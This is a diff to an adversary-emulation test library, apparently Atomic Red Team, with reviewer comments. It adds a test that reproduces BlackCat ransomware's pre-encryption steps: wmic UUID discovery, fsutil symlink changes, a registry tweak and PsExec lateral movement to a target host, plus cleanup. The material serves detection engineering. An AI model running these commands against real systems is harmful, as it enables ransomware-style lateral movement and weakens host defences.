diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 80047754..3cacfc48 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -642,6 +642,7 @@ execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a6
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1569.002,Service Execution,3,psexec.py (Impacket),edbcd8c9-3639-4844-afad-455c91e95a35,bash
+execution,T1569.002,Service Execution,4,BlackCat pre-encryption cmds with Lateral Movement,31eb7828-97d7-4067-9c1e-c6feb85edc4b,powershell
execution,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
execution,T1053.002,At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 8290c874..6d36a56c 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -474,6 +474,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6
execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
+execution,T1569.002,Service Execution,4,BlackCat pre-encryption cmds with Lateral Movement,31eb7828-97d7-4067-9c1e-c6feb85edc4b,powershell
execution,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 98416706..7b8de657 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1041,6 +1041,7 @@
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
- Atomic Test #3: psexec.py (Impacket) [linux]
+ - Atomic Test #4: BlackCat pre-encryption cmds with Lateral Movement [windows]
- [T1053.002 At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- Atomic Test #2: At - Schedule a job [linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index aa1cd5a0..94c277f7 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -766,6 +766,7 @@
- [T1569.002 Service Execution](../../T1569.002/T1569.002.md)
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
+ - Atomic Test #4: BlackCat pre-encryption cmds with Lateral Movement [windows]
- [T1053.002 At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- T1035 Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index cae2ce81..7fdf537a 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -46030,10 +46030,12 @@ execution:
atomic_tests:
- name: Execute a Command as a Service
auto_generated_guid: 2382dee2-a75f-49aa-9378-f52df6ed3fb1
- description: |
- Creates a service specifying an arbitrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly.
-
- Upon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file `art-marker.txt`
+ description: "Creates a service specifying an arbitrary command and executes
+ it. When executing commands such as PowerShell, the service will report that
+ it did not start correctly even when code executes properly.\n\nUpon successful
+ execution, cmd.exe creates a new service using sc.exe that will start powershell.exe
+ to create a new file `art-marker.txt`\n\n[BlackCat Ransomware (ALPHV)](https://www.varonis.com/blog/blackcat-ransomware)
+ \ \n[Cybereason vs. BlackCat Ransomware](https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware)\n"
supported_platforms:
- windows
input_arguments:
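Review bot: the two BlackCat reference links are appended to the description of Atomic Test #1 (Execute a Command as a Service), yet they document the behaviour emulated by the new Atomic Test #4; move them into the new test's description so the generic sc.exe test is not annotated with an unrelated ransomware write-up. The edit also turns the description from a `|` block scalar into a folded double-quoted scalar containing a stray `\ \n` (backslash-space) before the second link, which renders as a trailing space; index.yaml is regenerated from atomics/T1569.002/T1569.002.yaml, and that source file is not in this patch, so confirm the references live on test #4 there and that the block scalar form is kept.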
@@ -46148,6 +46150,31 @@ execution:
'
name: bash
+ - name: BlackCat pre-encryption cmds with Lateral Movement
+ auto_generated_guid: 31eb7828-97d7-4067-9c1e-c6feb85edc4b
+ description: This atomic attempts to emulate the unique behavior of BlackCat
+ ransomware prior to encryption and during Lateral Movement attempts via PsExec
+ on Windows. Uses bundled PsExec like BlackCat
+ supported_platforms:
+ - windows
+ input_arguments:
+ targethost:
+ description: Target hostname to attempt psexec connection to for emulation
+ of lateral movement.
+ type: string
+ default: "$ENV:COMPUTERNAME"
+ executor:
+ command: "cmd.exe /c \"wmic \tcsproduct \tget UUID\" \ncmd.exe /c \"fsutil
+ behavior \tset SymlinkEvaluation R2L:1\" \ncmd.exe /c \"fsutil behavior
+ set \tSymlinkEvaluation R2R:1\"\nreg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters
+ \ /v MaxMpxCt /d 65535 /t REG_DWORD /f \ncopy $pathtoatomicsfolder\\T1569.002\\bin\\PsExec.exe
+ $env:temp\ncmd.exe /c \"$env:temp\\psexec.exe -accepteula \\\\#{targethost}
+ cmd.exe /c echo \"--access-token\"\"\n"
+ cleanup_command: "reg delete HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters
+ /v MaxMpxCt /f\ncmd.exe /c \"fsutil behavior set SymlinkEvaluation R2L:0\"
+ \ncmd.exe /c \"fsutil behavior set SymlinkEvaluation R2R:0\"\nrm $env:temp\\psexec.exe\n"
+ name: powershell
+ elevation_required: true
T1053.002:
technique:
x_mitre_platforms:
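Review bot: the new test has no `dependencies` block, so nothing verifies that `$pathtoatomicsfolder\T1569.002\bin\PsExec.exe` exists before the `copy` step; add a dependency with a `prereq_command` that tests the path (and a `get_prereq_command` stating where the bundled binary comes from) so a missing PsExec fails at prerequisite checking rather than at the `copy` or `psexec.exe` line. The `command` string also embeds literal tab characters (`wmic \tcsproduct \tget UUID`, `behavior \tset`, `set \tSymlinkEvaluation`) that do not appear in the T1569.002.md rendering of the same commands; if the tabs deliberately reproduce the exact BlackCat command lines (useful for detection engineers matching on process command lines), say so in the description, otherwise normalise them to spaces so the YAML and the markdown agree.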
diff --git a/atomics/T1569.002/T1569.002.md b/atomics/T1569.002/T1569.002.md
index e4e97bb8..a76cb3ce 100644
--- a/atomics/T1569.002/T1569.002.md
+++ b/atomics/T1569.002/T1569.002.md
@@ -14,6 +14,8 @@ Adversaries may leverage these mechanisms to execute malicious content. This can
- [Atomic Test #3 - psexec.py (Impacket)](#atomic-test-3---psexecpy-impacket)
+- [Atomic Test #4 - BlackCat pre-encryption cmds with Lateral Movement](#atomic-test-4---blackcat-pre-encryption-cmds-with-lateral-movement)
+
@@ -22,6 +24,9 @@ Creates a service specifying an arbitrary command and executes it. When executin
Upon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file `art-marker.txt`
+[BlackCat Ransomware (ALPHV)](https://www.varonis.com/blog/blackcat-ransomware)
+[Cybereason vs. BlackCat Ransomware](https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware)
+
**Supported Platforms:** Windows
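Review bot: these reference links are inserted under the Atomic Test #1 description (the sc.exe test) but describe BlackCat, which is the subject of the new Atomic Test #4; move them below the Test #4 description so readers of Test #1 are not pointed at a ransomware report that has nothing to do with that test.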
@@ -159,4 +164,49 @@ sudo pip3 install impacket
+
+
+
+## Atomic Test #4 - BlackCat pre-encryption cmds with Lateral Movement
+This atomic attempts to emulate the unique behavior of BlackCat ransomware prior to encryption and during Lateral Movement attempts via PsExec on Windows. Uses bundled PsExec like BlackCat
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 31eb7828-97d7-4067-9c1e-c6feb85edc4b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| targethost | Target hostname to attempt psexec connection to for emulation of lateral movement. | string | $ENV:COMPUTERNAME|
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+cmd.exe /c "wmic csproduct get UUID"
+cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:1"
+cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:1"
+reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f
+copy $pathtoatomicsfolder\T1569.002\bin\PsExec.exe $env:temp
+cmd.exe /c "$env:temp\psexec.exe -accepteula \\#{targethost} cmd.exe /c echo "--access-token""
+```
+
+#### Cleanup Commands:
+```powershell
+reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /f
+cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:0"
+cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:0"
+rm $env:temp\psexec.exe
+```
+
+
+
+
+
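Review bot: the quoting on the last attack command, `cmd.exe /c "$env:temp\psexec.exe -accepteula \\#{targethost} cmd.exe /c echo "--access-token""`, is not what it looks like under the `powershell` executor: PowerShell ends the string at the quote before `--access-token`, concatenates the bare token and the trailing empty string `""` onto the same argument, and the inner double quotes never reach cmd.exe; if the quoted `"--access-token"` form is what should appear in the remote process command line (the artifact a detection would match on), escape the inner quotes with a backtick (`` `" ``) or pass the whole command line in single quotes. The cleanup also runs `reg delete ... /v MaxMpxCt /f` unconditionally, which removes a `MaxMpxCt` value an administrator may have configured before the test ran; read the existing value (if any) in the attack commands and restore it in cleanup rather than deleting it.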